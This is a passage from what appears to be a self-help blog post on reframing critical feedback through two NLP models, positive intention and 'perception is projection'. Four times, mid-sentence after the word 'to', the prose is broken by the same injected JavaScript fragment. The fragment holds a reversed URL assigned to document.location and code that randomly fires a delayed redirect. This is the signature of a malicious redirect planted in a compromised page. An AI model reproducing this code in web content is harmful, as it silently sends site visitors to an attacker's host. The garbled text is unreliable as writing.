Their input is valid and useful.

Re-framing difficult feedback

When it seems critical, or undermining, NLP thinking gives us two really useful models tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to re-frame it:

  1. There is a positive intention behind it – what positive intention could the critic have had? Perhaps they were trying tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to cushion the blow for any future “failure” you may experience? Perhaps they were trying tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to give you an easy way out.
  2. Perception is projection (or, their comment says more about them, than about you) – perhaps their comment was based on their own inability tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to see through a similar change. Perhaps it is based on their perception of “reality”, which probably doesn’t even match your own reality.

With these two models we can appreciate all input, and have gratitude and compassion for the person making these comments. Yes, even when the input may appear unhelpful or hurtful.

Of course, you are probably only experiencing positive, empowering and encouraging feedback, in which case appreciate it all the more!
